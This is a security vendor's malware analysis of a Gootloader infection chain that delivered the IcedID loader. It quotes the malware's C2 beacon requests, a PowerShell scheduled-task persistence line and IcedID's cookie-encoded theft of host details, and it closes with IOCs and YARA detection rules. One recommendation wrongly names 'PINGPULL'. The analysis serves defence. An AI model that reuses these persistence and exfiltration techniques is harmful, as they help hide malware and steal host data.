Gootloader is a Malware-as-a-Service (MaaS) offering that is spread through Search Engine Optimization (SEO) poisoning to distribute malicious payloads, such as IcedID. Threat actors have begun using IcedID, a former banking trojan, since it’s a stealthier option compared to Cobalt Strike.
In fact, the eSentire Threat Response Unit (TRU) team recently published a security advisory, The Popular Malware Downloader, GootLoader, Expands its Payloads Yet Again, Infecting a Law Firm with IcedID, that outlined TRU’s discovery of threat actors deploying IcedID onto a law firm’s IT environment via an employee’s computer. However, our team of 24/7 Cyber SOC Analysts immediately isolated the infected endpoint and worked with TRU to diagnose the malware as IcedID after cleaning the endpoint.
This malware analysis is a deeper technical dive of how Gootloader and IcedID are deployed and our security recommendations to protect your organization from being exploited.
Key Takeaways
- Gootloader is a sophisticated malware, which, upon communication with a C2 server, serves the second-stage payload only for machines that are a part of the Active Directory.
- The threat actor(s) has been switching between delivering Cobalt Strike and IcedID as a second-stage payload. eSentire’s Threat Response Unit (TRU) team assesses with high confidence that threat actors are delivering IcedID, instead of Cobalt Strike as a second stage, as it is a stealthier option to avoid the detection.
- Gootloader has been observed dropping Cobalt Strike payloads under HKCUSOFTWAREMicrosoftPhoneusername0, HKCUSOFTWAREMicrosoftPhoneusername (username0)
- Gootloader has been observed dropping IcedID payloads under HKCUSOFTWAREMicrosoftusername (username0)
- Gootloader is using a process hollowing technique to inject IcedID loader into PowerShell processes. PowerShell can be used for legitimate process running in the background; thus, Gootloader infections can go unnoticed.
- To secure your organization against PINGPULL, eSentire’s Threat Response Unit (TRU) team recommends:
- Implement a Phishing and Security Awareness Training (PSAT) program that educates & informs employees on emerging threats in the threat landscape.
- Confirm that all devices are protected with Endpoint Detection and Response (EDR) solutions.
- Address security issues in Active Directory by thoroughly reviewing and securing SYSVOL permissions, patching any known vulnerabilities, implementing Least-Privilege administrative models.
- Ensure standard procedures are in place for employees to submit potentially malicious content for review.
Case Study
eSentire’s Threat Response Unit (TRU) team has recently observed multiple Gootloader infections. One notable Gootloader incident delivered an IcedID loader. The malware targets domain joined machines. The infection starts with the user visiting the infected website with a lure to download a ZIP file. The ZIP archive contains the JavaScript malicious file that is responsible for reaching out to one of three hardcoded domains to retrieve the second-stage payload.
Gootloader and IcedID Technical Analysis
As mentioned previously, the infection starts when a user visits an infected website and downloads a ZIP archive which contains a highly obfuscated malicious JavaScript file. The filename in most cases includes the keyword “agreement”. Gootloader leverages SEO poisoning to deliver the initial payload as shown in Exhibit 1.
When visiting one of the many compromised websites, the user is served with a Gootloader landing page that includes the link to the malicious ZIP archive (Figure 2). Since the user’s location and browser information is recorded during the visit, if the user visits a subsequent infected webpage, they will not be served with another Gootloader payload.
The JavaScript file within the ZIP archive decodes itself during the runtime and reaches out to one of the three hardcoded compromised websites.
The script checks if the infected host is a part of the Active Directory domain by using the environment variable %USERDNSDOMAIN%, the variable contains the FQDN (fully qualified domain name) of the computer. If the infected host successfully logs on to one of the malicious domains, the value “4173581” appends to the URL GET request that gets sent to the C2 server. If one of the C2 servers provided in the L parameter doesn’t respond with status code 200, the script sleeps for 23.232 seconds (23232 milliseconds) and attempts to connect to the next URL (Exhibit 3).
The GET request (on a domain joined machine):
GET /test.php?cvtbyyxsqwsw=201492074208614154173581 HTTP/1.1 Connection: Keep-Alive Accept: */* Accept-Language: en-us User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) Host: www[.]liveshopping-aktuell[.]de
Upon the successful communication with the C2 channel, Gootloader serves the second-stage payloads to the infected host from one of the infected websites in less than 2 minutes from the execution of the JavaScript file. The first main encoded payload is written to the registry key under HKEY_CURRENT_USERSOFTWAREMicrosoftusername via Wscript process using RegWrite
Method (Exhibits 4-5).
The second payload is written to HKEY_CURRENT_USERSOFTWAREMicrosoftusername0 (Exhibit 6). The payload is a 32-bit DLL (Dynamic Link Library) written in C# and is named as powershell.dll. The C# payload is responsible for decoding the main payload by replacing the ASCII characters with numeric values within Test() Class (Exhibit 7).
eSentire TRU previously observed Gootloader writing Cobalt Strike payloads under HKEY_CURRENT_USERSOFTWAREMicrosoftPhoneusername0
and HKEY_CURRENT_USERSOFTWAREMicrosoftPhoneusername registry keys.
Gootloader uses process hollowing
techniques (i.e., replacing the legitimate executable section of the process with a malicious code by hollowing or unmapping its memory) to inject the main payload into the PowerShell process via Foad() Class using APIs such as ZwUnmapViewOfSection, VirtualAllocEx, WriteProcessMemory
and ResumeThread
as shown in Exhibit 8. Previously, GootLoader was observed
to inject the payloads into ImagingDevice.exe process.
In some cases, we have observed the scheduled task is created as a persistence mechanism to decode the registry values by replacing “#” with “1000” and reflectively loads the second decoder payload in-memory. The script is base64-encoded and executed via PowerShell (Exhibits 9-10).
The following code block responsible for creating the scheduled task (the scheduled task is named after the username):
$yl=$env:USERNAME;Register-ScheduledTask $yl -In (New-ScheduledTask -Ac (New-ScheduledTaskAction -E $ibs -Ar $zb) -Tr (New-ScheduledTaskTrigger -AtL -U $yl))
eSentire TRU was able to identify the main payload as IcedID.
IcedID Analysis
The sample was compiled on May 25th, 2022, which was 5 days before the infection. The packed sample is 147 KB in size (MD5: 157d12885e5f6434436862aadd6224cd). The executable was compiled using MingW GCC. The unpacked sample is only 16 KB in size (MD5: 578143ef946796590c0dd5f5dcfdada7).
IcedID performs anti-VM/anti-sandboxing techniques to check if it’s running in a sandbox environment using RDTSC
(Read Time Stamp Counter) instruction to get a processor’s time stamp counter as well as CPUID, SwitchToThread
instructions with a loop for an accurate measurement during the calculation of the execution times (Exhibit 11).
IcedID gathers the information on the infected machine and transfers it via the Cookie parameter with GET request as shown below:
GET / HTTP/1.1 Connection: Keep-Alive Cookie: __gads=1073741824:1:352:136; __gat=10.0.19043.64; _ga=1.591597.1635208534.1946; _u=4445534B544F502D5043373941514B:73616C6573; __io=21_3122393604_3742086262_449295377; _gid=0068595A4472 Host: ilekvoyn[dot]com
Breakdown of the Cookie parameters:
- __gads – retrieves IcedID campaign ID (it’s worth noting that the campaign IDs from the extracted configuration are different from the one that gets sent out to the C2), the flag, the number of milliseconds that have elapsed since system startup (using GetTickCount
function) and system information (using ZwQuerySystemInformation). - __gat – the OS version (retrieves using RtlGetVersion
function) as shown in Exhibit 12. - _ga – retrieves the process information using CPUID function and Hypervisor Vendor information as shown in Exhibit 13.
- _u – retrieves the computer name and username via GetComputerNameExW
and GetUserNameW
functions and stores them in the hexadecimal format (Exhibit 14). - __io – retrieves the user security identifier (SID).
- _gid – gets the network adapter information via GetAdaptersInfo
(Exhibit 15).
After successfully connecting to the C2 server, IcedID drops the payload in ProgramData folder (Exhibits 16-17).
As we can see, the unpacked IcedID payload is relatively small, but it contains the capabilities that threat actor(s) need to deploy a secondary payload from the C2 server. IcedID was observed to deliver Cobalt Strike, Conti ransomware, Quantum ransomware, and XingLocker ransomware in the past.
How eSentire is Responding
Our Threat Response Unit (TRU) combines threat intelligence obtained from research and security incidents to create positive security outcomes for our customers. We take a holistic approach to combat modern cybersecurity threats by deploying countermeasures, such as:
- Implementing threat detections and BlueSteel, our machine- learning powered PowerShell classifier, to identify malicious command execution and exploitation attempts and ensure that eSentire has visibility, and detections are in place across eSentire MDR for Endpoint and MDR for Network.
- Performing global threat hunts for indicators associated with Gootloader and IcedID.
Our detection content is supported by investigation runbooks, ensuring our 24/7 Cyber SOC Analysts respond rapidly to any intrusion attempts related to a known malware Tactics, Techniques, and Procedures (TTPs). In addition, TRU closely monitors the threat landscape and constantly addresses capability gaps and conducts retroactive threat hunts to assess customer impact.
Recommendations from eSentire’s Threat Response Unit (TRU)
We recommend implementing the following controls to help secure your organization against Gootloader and Iced ID malware:
- Address security issues in Active Directory by thoroughly reviewing and securing SYSVOL permissions, patching any known vulnerabilities, implementing Least-Privilege administrative models.
- Ensure standard procedures are in place for employees to submit potentially malicious content for review.
While the TTPs used by adversaries grow in sophistication, they lead to a certain level of difficulties at which critical business decisions must be made. Preventing the various attack paths utilized by the modern threat actor requires actively monitoring the threat landscape, developing, and deploying endpoint detection, and the ability to investigate logs & network data during active intrusions.
eSentire’s TRU is a world-class team of threat researchers who develop new detections enriched by original threat intelligence and leverage new machine learning models that correlate multi-signal data and automate rapid response to advanced threats.
If you are not currently engaged with an MDR provider, eSentire MDR can help you reclaim the advantage and put your business ahead of disruption.
Learn what it means to have an elite team of Threat Hunters and Researchers that works for you. Connect with an eSentire Security Specialist.
Appendix
Indicators of Compromise
Name | Indicators |
IcedID packed payload | 157d12885e5f6434436862aadd6224cd |
IcedID unpacked payload | 578143ef946796590c0dd5f5dcfdada7 |
IcedID C2 | ilekvoyn[dot]com |
Gootloader C2 | www[dot]liveshopping-aktuell[dot]de |
Gootloader C2 | www[dot]lightnessofbeing[dot]net |
Gootloader C2 | www[dot]lintelconsulting[dot]co[dot]uk |
employee confidentiality agreement texas(9898).zip – Gootloader initial payload (ZIP archive) | 1c822f5a7d92307f9cf8ad5f28f61a76 |
employee_confidentiality_agreement_texas 19855.js – Gootloader initial payload (JavaScript file) | c6bac95375b8c7fb3b16c7dff98d2cc0 |
IcedID campaign ID | 277708695 |
Yara Rules
Yara Rules
rule gootloader_JS { meta: description = "Detects Gootloader JavaScript file" author = "eSentire TI" date = "06/13/2022" strings: $a = "w+" $a1 = "x" $a2 = "Sp" $a3 = "E" $a4 = "function" $a5 = "while" condition: all of ($a*) and filesize < 300KB }
rule IcedID_loader { meta: description = "Detects IcedID loader" author = "eSentire TI" date = "06/13/2022" strings: $a = "oCookie: _s=" wide fullword nocase $a1 = "Cookie: __gads=" wide fullword nocase $a2 = "oCookie: _s=" wide fullword nocase $a3 = "__io=" wide fullword nocase $a4 = {63 3A 5C 50 72 6F 67 72 61 6D 44 61 74 61 5C} $a5 = {3B 00 20 00 5F 00 67 00 61 00 3D} $a6 = {3B 00 20 00 5F 00 67 00 69 00 64 00 3D} $a7 = {3B 00 20 00 5F 00 67 00 61 00 74 00 3D} condition: all of ($a*) and filesize < 20KB }
Source: https://www.esentire.com/blog/esentire-threat-intelligence-malware-analysis-gootloader-and-icedid